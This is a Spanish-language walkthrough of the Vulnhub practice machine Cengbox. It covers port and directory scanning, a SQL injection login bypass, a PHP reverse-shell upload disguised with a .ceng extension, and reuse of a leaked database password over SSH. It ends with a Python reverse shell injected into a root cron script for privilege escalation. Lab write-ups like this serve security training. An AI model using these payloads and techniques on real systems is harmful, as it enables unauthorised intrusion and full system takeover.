[VLN] Cengbox

Hoy vamos a hackear la maquina de Vulnhub llamada Cengbox. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/cengbox-1,475/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.66 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:05 CEST Nmap scan report for 192.168.1.66 Host is up (0.00032s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:cc:28:f3:8c:f5:0e:3f:5a:ed:13:f3:ad:53:13:9b (RSA) | 256 f7:3a:a3:ff:a1:f7:e5:1b:1e:6f:58:5f:c7:02:55:9b (ECDSA) |_ 256 f0:dd:2e:1d:3d:0a:e8:c1:5f:52:7c:55:2c:dc:1e:ef (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: CEng Company Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.40 seconds

Miramos si encontramos algo interesante en el Apache.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.66 -w /usr/share/wordlists/dirb/big.txt -x txt,php =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.66 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,php [+] Timeout: 10s =============================================================== 2020/05/07 23:07:09 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htpasswd.txt (Status: 403) /.htpasswd.php (Status: 403) /.htaccess (Status: 403) /.htaccess.txt (Status: 403) /.htaccess.php (Status: 403) /css (Status: 301) /img (Status: 301) /index.php (Status: 200) /js (Status: 301) /masteradmin (Status: 301) /server-status (Status: 403) /uploads (Status: 301) /vendor (Status: 301) =============================================================== 2020/05/07 23:07:28 Finished ===============================================================

Vemos que hay 2 directorios que nos llaman la atencion: /masteradmin y /uploads. Al entrar en masteradmin, nos aparece Forbidden, asi que exploramos un poco mas este directorio.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.135/masteradmin -w /usr/share/wordlist/dirb/big.txt -x php =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.135/masteradmin [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php [+] Timeout: 10s =============================================================== 2020/05/15 09:34:36 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htaccess.php (Status: 403) /.htpasswd (Status: 403) /.htpasswd.php (Status: 403) /css (Status: 301) /db.php (Status: 200) /fonts (Status: 301) /images (Status: 301) /js (Status: 301) /login.php (Status: 200) /upload.php (Status: 200) /vendor (Status: 301) =============================================================== 2020/05/15 09:35:06 Finished ===============================================================

Accedemos a http://192.168.1.66/masteradmin/login.php

Exploitation

Se trata de un SQL Injection.

'or 1=1;# 'or 1=1;#

Una vez dentro, vemos que podemos hacer upload. Al intentar subir nuestra webshell .php, obtenemos una respuesta de que escojamos un fichero .ceng. Asi que preparamos nuestra webshell y la renombramos terminando en .ceng:

sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php revshell.php sml@Cassandra:~$ nano revshell.php sml@Cassandra:~$ mv revshell.php revshell.php.ceng

Ponemos nc a la escucha.

nc -nlvp 5555

Lanzamos la webshell accediendo a: http://192.168.1.66/uploads/webshell.php.ceng

Low shell

sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.66] 45476 Linux cengbox 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16 01:16:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 00:25:30 up 21 min, 0 users, load average: 0.08, 0.20, 0.17 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ahora que estamos dentro, exploramos el sistema.

$ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@cengbox:/$ cd /var/www/html/masteradmin www-data@cengbox:/var/www/html/masteradmin$ cat db.php --SNIP-- $serverName = "localhost"; $username = "root"; $password = "SuperS3cR3TPassw0rd1!"; $dbName = "cengbox"; //Create Connection $conn = new mysqli($serverName, $username, $password,$dbName); //Check Connection if($conn->connect_error){ die("Connection Failed: ".$conn->connect_error); } else { } --SNIP--

Nos conectamos al mysql con las credenciales obtenidas.

Probamos esa password, usando como usuario cengover.

user.txt

sml@Cassandra:~$ ssh cengover@192.168.1.66 cengover@192.168.1.66's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-177-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 78 packages can be updated. 0 updates are security updates. Last login: Wed Apr 29 18:42:51 2020 from 192.168.0.14 cengover@cengbox:~$ ls user.txt cengover@cengbox:~$ cat user.txt 8f7f6471e2e869f029a75c5de601d5e0

Privilege Escalation

cengover@cengbox:~/$ groups cengover adm cdrom dip plugdev users lxd lpadmin sambashare cengover@cengbox:~/$ find / -group users 2>/dev/null /opt/md5check.py

Encontramos este script que por el contenido, entendemos que hay una tarea que lo ejecuta periodicamente y que el propietario es root. Lo editamos y agregamos lo siguiente para conseguir una reverse shell de root la proxima vez que se ejecute.

import socket import subprocess import os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.148",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]);

Ponemos nc a la escucha y esperamos :)

sml@Cassandra:/var/www/html$ nc -nlvp 8888 listening on [any] 8888 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.66] 37870 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root)

root.txt

# cd /root # ls note.txt root.txt warning.txt # cat root.txt / ____| ____| | _ \ | | | |__ _ __ __ _| |_) | _____ __ | | | __| | '_ \ / _` | _ < / _ \ \/ / | |____| |____| | | | (_| | |_) | (_) > < \_____|______|_| |_|\__, |____/ \___/_/\_\ __/ | |___/ Congrats. Hope you enjoyed it and you can contact me on Twitter @arslanblcn_ a51e522b22a439b8e1b22d84f71cf0f2

End

Y con esto ya tendriamos el flag del "user" y el flag de "root".